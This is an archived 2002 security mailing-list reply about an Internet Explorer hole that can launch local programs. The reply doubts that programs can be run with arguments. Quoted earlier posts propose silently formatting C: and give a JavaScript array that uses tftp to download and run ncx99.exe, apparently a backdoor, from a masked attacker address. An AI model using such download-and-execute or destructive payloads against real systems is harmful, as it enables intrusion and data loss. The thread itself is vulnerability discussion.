Re: Rather large MSIE-hole

From: methodic (methodicat_private)
Date: Thu Mar 14 2002 - 00:39:58 PST

Next message: H D Moore: "Re: idq.dll problem??"

Previous message: Greg Rice: "RE: Ph.D Network/Internet/Web/App security"
In reply to: NoCoNFLiC: "Re: Rather large MSIE-hole"
Next in thread: Felipe Franciosi: "Re: Rather large MSIE-hole"
Next in thread: Jim Harrison (SPG): "RE: Rather large MSIE-hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Im not sure who else has looked at this, but I dont believe its possible
to run programs with arguments using this vuln.

On 03.13.02, NoCoNFLiC <noconat_private> wrote:
> [nyquistat_private] Wed, Mar 13, 2002 at 08:45:46AM +0000 wrote:
> > If this is confirmed, could this array by changed to equal, erm...let's
> > say format.exe (with a couple of parameters to silently format C:/)?
> > 
> >  var programName=new Array(
> >  	'c:/windows/system32/logoff.exe',
> >  	'c:/winxp/system32/logoff.exe',
> >  	'c:/winnt/system32/logoff.exe'
> 
> 
>    I havent tried, since i don't run MS, how about ? 
> 
> var programName=new Array(
>      'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
>      'c:/winnt/system32/ncx99.exe',
>  );
> 
> 
> - nocon
> 
>  

-- 
+ methodic >> [http://methodic.angrypacket.com] -- -
+ Cannot find nsabackdoor.dll. Please reinstall Windows.

Next message: H D Moore: "Re: idq.dll problem??"
Previous message: Greg Rice: "RE: Ph.D Network/Internet/Web/App security"
In reply to: NoCoNFLiC: "Re: Rather large MSIE-hole"
Next in thread: Felipe Franciosi: "Re: Rather large MSIE-hole"
Next in thread: Jim Harrison (SPG): "RE: Rather large MSIE-hole"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Mar 14 2002 - 08:25:19 PST